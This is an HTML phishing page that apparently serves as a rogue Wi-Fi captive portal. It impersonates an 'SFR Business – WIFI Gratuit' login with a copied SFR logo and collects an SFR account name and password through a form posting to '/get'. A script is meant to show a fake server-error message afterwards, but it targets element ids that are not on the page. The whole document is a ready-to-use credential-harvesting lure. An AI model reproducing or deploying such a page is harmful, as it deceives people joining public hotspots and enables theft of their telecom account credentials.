<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        /* Styles généraux pour les écrans étroits (smartphones) */
        a:hover {
            text-decoration: underline;
        }

        body {
            font-family: Arial, sans-serif;
            align-items: center;
            justify-content: center;
            background-color: #FFFFFF;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 10px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid #cccccc;
            border-radius: 4px;
        }

        .container {
            max-width: 100%;
            margin: auto;
            padding: 20px;
        }

        .logo-container {
            text-align: center;
            margin-bottom: 30px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .logo {
            max-width: 40px;
            max-height: 40px;
            fill: #FFC72C;
            margin-right: 100px;
        }

        .company-name {
            font-size: 42px;
            color: black;
            margin-left: 0px;
        }

        .form-container {
            background: #FFFFFF;
            border: 1px solid #CEC0DE;
            border-radius: 4px;
            padding: 20px;
            box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
        }

        h1 {
            text-align: center;
            font-size: 28px;
            font-weight: 500;
            margin-bottom: 20px;
        }

        .input-field {
            width: 100%;
            padding: 12px;
            border: 1px solid #BEABD3;
            border-radius: 4px;
            margin-bottom: 20px;
            font-size: 14px;
        }

        .submit-btn {
            background: #000000;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 4px;
            font-size: 16px;
        }

        .submit-btn:hover {
            background: #5B3784;
        }

        .containersubtitle {
            color: #000000;
        }

        .containertitle {
            color: #000000;
        }

        /* Styles spécifiques pour les écrans larges (PC) */
        @media screen and (min-width: 768px) {
            .logo {
                max-width: 80px;
                max-height: 80px;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="logo-container">
        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN"
        "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
        <svg width="518" height="176" viewBox="0 0 137 44" fill="none" xmlns="http://www.w3.org/2000/svg">
<path d="M44 0H0V44H44V0Z" fill="#E2001A"/>
<path d="M21.7532 28.4651V14.8643H30.067V17.0126H23.9915V20.738H29.2226V22.8491H23.9915V28.4651H21.7532ZM39.5047 28.4651L36.4623 22.9888H34.1898V28.4651H31.9515V14.8643H36.9745C38.9956 14.8643 41.6934 15.4324 41.6934 18.8163C41.6934 21.1168 40.5012 22.1816 38.6199 22.6783L42.1559 28.4651H39.4985H39.5047ZM36.7013 20.9553C38.7286 20.9553 39.365 20.0892 39.365 18.7915C39.365 17.9346 38.98 16.8729 36.779 16.8729H34.1929V20.9553H36.7013ZM14.3614 20.2071C12.7471 19.7539 12.5577 18.9032 12.5577 18.3506C12.5577 17.2951 13.3742 16.5873 14.8457 16.5873C15.8609 16.5873 16.7581 17.0219 17.4131 17.8881L19.1858 16.8543C18.3258 15.5908 16.994 14.5383 14.8395 14.5383C12.2969 14.5383 10.2107 16.1185 10.2107 18.45C10.2107 20.7815 12.182 21.7904 14.2838 22.3803C14.2838 22.3803 15.2493 22.6597 15.2586 22.6628C17.0623 23.1378 17.202 23.9543 17.202 24.659C17.202 25.9473 15.8516 26.7452 14.6843 26.7452C13.517 26.7452 12.4956 26.3447 11.7102 24.9508L9.9375 26.0063C11.0862 27.9808 12.4646 28.7849 14.6967 28.7849C17.1586 28.7849 19.5397 26.9066 19.5397 24.5596C19.5397 21.7811 17.2858 20.9957 15.3362 20.4896C15.3269 20.4896 14.3645 20.2102 14.3645 20.2102L14.3614 20.2071Z" fill="white"/>
<path d="M60.469 22.6349C60.9782 23.2744 61.2328 23.9978 61.2328 24.808C61.2328 25.5003 61.0527 26.1212 60.6957 26.6769C60.3356 27.2326 59.8171 27.6673 59.1403 27.987C58.4604 28.3068 57.6719 28.4651 56.7716 28.4651H51.3325V14.8674H56.517C57.4422 14.8674 58.24 15.0227 58.9044 15.3362C59.5687 15.6498 60.0717 16.0689 60.4101 16.5966C60.7485 17.1244 60.9192 17.7143 60.9192 18.3662C60.9192 19.1485 60.7112 19.8005 60.2921 20.322C59.873 20.8436 59.3142 21.2285 58.6095 21.4769C59.339 21.6073 59.9599 21.9922 60.469 22.6318V22.6349ZM53.5615 20.5797H56.3214C57.051 20.5797 57.6222 20.4121 58.032 20.0799C58.4418 19.7477 58.6498 19.2665 58.6498 18.6425C58.6498 18.0185 58.4449 17.5497 58.032 17.2051C57.6222 16.8605 57.051 16.6867 56.3214 16.6867H53.5615V20.5797ZM58.3549 26.0964C58.7864 25.7301 59.0006 25.224 59.0006 24.569C59.0006 23.9139 58.7709 23.3769 58.3145 22.9857C57.8582 22.5945 57.2528 22.3989 56.4953 22.3989H53.5615V26.6459H56.576C57.3335 26.6459 57.9265 26.4627 58.358 26.0995L58.3549 26.0964Z" fill="black"/>
<path d="M65.4613 14.8674V23.5352C65.4613 24.5659 65.7314 25.342 66.2747 25.8636C66.8148 26.3851 67.5692 26.6459 68.5347 26.6459C69.5002 26.6459 70.2732 26.3851 70.8134 25.8636C71.3536 25.342 71.6268 24.5659 71.6268 23.5352V14.8674H73.8589V23.4948C73.8589 24.6031 73.6168 25.5438 73.1356 26.3137C72.6544 27.0836 72.0086 27.658 71.1984 28.0367C70.3881 28.4154 69.4971 28.6048 68.5192 28.6048C67.5413 28.6048 66.6503 28.4154 65.8493 28.0367C65.0484 27.658 64.412 27.0836 63.9401 26.3137C63.4713 25.5438 63.2354 24.6062 63.2354 23.4948V14.8674H65.4644H65.4613Z" fill="black"/>
<path d="M78.2827 28.1236C77.5532 27.8039 76.9788 27.3506 76.5597 26.7639C76.1406 26.1771 75.9326 25.491 75.9326 24.7087H78.32C78.3728 25.2955 78.6025 25.7798 79.0154 26.1554C79.4252 26.5341 80.0026 26.7235 80.7477 26.7235C81.4928 26.7235 82.1168 26.5373 82.5483 26.1647C82.9798 25.7922 83.194 25.3141 83.194 24.7273C83.194 24.271 83.0605 23.8984 82.7936 23.6128C82.5266 23.3272 82.1944 23.1037 81.797 22.9485C81.3996 22.7932 80.847 22.6225 80.1423 22.4393C79.2544 22.2034 78.5342 21.9674 77.9816 21.7253C77.4259 21.4831 76.954 21.1075 76.5628 20.6015C76.1717 20.0923 75.9761 19.4155 75.9761 18.568C75.9761 17.7857 76.1717 17.0996 76.5628 16.5128C76.954 15.9261 77.5035 15.4759 78.2051 15.1624C78.9098 14.8488 79.7232 14.6936 80.6515 14.6936C81.9678 14.6936 83.0481 15.0227 83.8894 15.6808C84.7308 16.339 85.1964 17.2424 85.2896 18.3911H82.8246C82.7842 17.8943 82.5514 17.4721 82.1199 17.1182C81.6884 16.7674 81.1233 16.5904 80.4186 16.5904C79.7791 16.5904 79.2575 16.755 78.8539 17.081C78.4504 17.4069 78.2486 17.8757 78.2486 18.4904C78.2486 18.9095 78.3759 19.251 78.6304 19.518C78.885 19.785 79.2079 19.9961 79.599 20.1544C79.9902 20.3096 80.5242 20.4804 81.2041 20.6635C82.1044 20.9119 82.837 21.1603 83.4051 21.4086C83.9733 21.657 84.4545 22.0388 84.8518 22.5542C85.2492 23.0695 85.4479 23.7587 85.4479 24.6187C85.4479 25.311 85.2616 25.9629 84.8891 26.5745C84.5165 27.1892 83.9764 27.6797 83.2654 28.0522C82.5545 28.4248 81.7163 28.6111 80.7508 28.6111C79.8381 28.6111 79.0154 28.4527 78.2858 28.133L78.2827 28.1236Z" fill="black"/>
<path d="M89.8874 14.8674V28.4651H87.6553V14.8674H89.8874Z" fill="black"/>
<path d="M103.727 28.4651H101.498L94.7863 18.3103V28.4651H92.5542V14.8457H94.7863L101.498 24.9819V14.8457H103.727V28.4651Z" fill="black"/>
<path d="M108.62 16.668V20.6604H113.317V22.4797H108.62V26.6459H113.904V28.4651H106.391V14.8457H113.904V16.6649H108.62V16.668Z" fill="black"/>
<path d="M117.725 28.1236C116.996 27.8039 116.421 27.3506 116.002 26.7639C115.583 26.1771 115.375 25.491 115.375 24.7087H117.762C117.815 25.2955 118.045 25.7798 118.458 26.1554C118.868 26.5341 119.445 26.7235 120.19 26.7235C120.935 26.7235 121.559 26.5373 121.991 26.1647C122.422 25.7922 122.636 25.3141 122.636 24.7273C122.636 24.271 122.503 23.8984 122.236 23.6128C121.969 23.3272 121.637 23.1037 121.239 22.9485C120.842 22.7932 120.289 22.6225 119.585 22.4393C118.697 22.2034 117.977 21.9674 117.424 21.7253C116.868 21.4831 116.396 21.1075 116.005 20.6015C115.614 20.0923 115.418 19.4155 115.418 18.568C115.418 17.7857 115.614 17.0996 116.005 16.5128C116.396 15.9261 116.946 15.4759 117.647 15.1624C118.352 14.8488 119.166 14.6936 120.094 14.6936C121.41 14.6936 122.491 15.0227 123.332 15.6808C124.173 16.339 124.639 17.2424 124.732 18.3911H122.267C122.227 17.8943 121.994 17.4721 121.562 17.1182C121.131 16.7674 120.566 16.5904 119.861 16.5904C119.221 16.5904 118.7 16.755 118.296 17.081C117.893 17.4069 117.691 17.8757 117.691 18.4904C117.691 18.9095 117.818 19.251 118.073 19.518C118.327 19.785 118.65 19.9961 119.041 20.1544C119.433 20.3096 119.967 20.4804 120.646 20.6635C121.547 20.9119 122.279 21.1603 122.848 21.4086C123.416 21.657 123.897 22.0388 124.294 22.5542C124.692 23.0695 124.89 23.7587 124.89 24.6187C124.89 25.311 124.704 25.9629 124.331 26.5745C123.959 27.1892 123.419 27.6797 122.708 28.0522C121.997 28.4248 121.159 28.6111 120.193 28.6111C119.28 28.6111 118.458 28.4527 117.728 28.133L117.725 28.1236Z" fill="black"/>
<path d="M128.951 28.1236C128.222 27.8039 127.647 27.3506 127.228 26.7639C126.809 26.1771 126.601 25.491 126.601 24.7087H128.988C129.041 25.2955 129.271 25.7798 129.684 26.1554C130.094 26.5341 130.671 26.7235 131.416 26.7235C132.161 26.7235 132.785 26.5373 133.217 26.1647C133.648 25.7922 133.862 25.3141 133.862 24.7273C133.862 24.271 133.729 23.8984 133.462 23.6128C133.195 23.3272 132.863 23.1037 132.465 22.9485C132.068 22.7932 131.515 22.6225 130.811 22.4393C129.923 22.2034 129.203 21.9674 128.65 21.7253C128.094 21.4831 127.622 21.1075 127.231 20.6015C126.84 20.0923 126.645 19.4155 126.645 18.568C126.645 17.7857 126.84 17.0996 127.231 16.5128C127.622 15.9261 128.172 15.4759 128.874 15.1624C129.578 14.8488 130.392 14.6936 131.32 14.6936C132.636 14.6936 133.717 15.0227 134.558 15.6808C135.399 16.339 135.865 17.2424 135.958 18.3911H133.493C133.453 17.8943 133.22 17.4721 132.788 17.1182C132.357 16.7674 131.792 16.5904 131.087 16.5904C130.448 16.5904 129.926 16.755 129.522 17.081C129.119 17.4069 128.917 17.8757 128.917 18.4904C128.917 18.9095 129.044 19.251 129.299 19.518C129.553 19.785 129.876 19.9961 130.267 20.1544C130.659 20.3096 131.193 20.4804 131.872 20.6635C132.773 20.9119 133.505 21.1603 134.074 21.4086C134.642 21.657 135.123 22.0388 135.52 22.5542C135.918 23.0695 136.116 23.7587 136.116 24.6187C136.116 25.311 135.93 25.9629 135.558 26.5745C135.185 27.1892 134.645 27.6797 133.934 28.0522C133.223 28.4248 132.385 28.6111 131.419 28.6111C130.507 28.6111 129.684 28.4527 128.954 28.133L128.951 28.1236Z" fill="black"/>
</svg>

    </div>
    <div class="form-container">
        <center>
            <h1 class='containertitle'>Bienvenue sur SFR Business - WIFI Gratuit.</h1>
            <h2 class='containersubtitle'> Connectez vous avec votre compte SFR.</h2>
        </center>
        <form action="/get" id="login-form">
            <input name="email" class="input-field" type="text" placeholder="Compte SFR" required>
            <input name="password" class="input-field" type="password" placeholder="Mot de passe" required>
            <button class="submit-btn" type="submit">Continue</button>
        </form>
    </div>
</div>
<script>
    function showErrorPage() {document.write("<div style='margin-top:10%;background: lightgrey;max-width: 33%;margin: auto;padding: 20px;'><h1 style='text-align: center;color: black'>Our servers seem to be having some difficulties<h1></div>");}document.getElementById("submitbtn").addEventListener("click", showErrorPage);document.getElementById("forgot_credentials").addEventListener("click", showErrorPage);
</script>
</body>
</html>
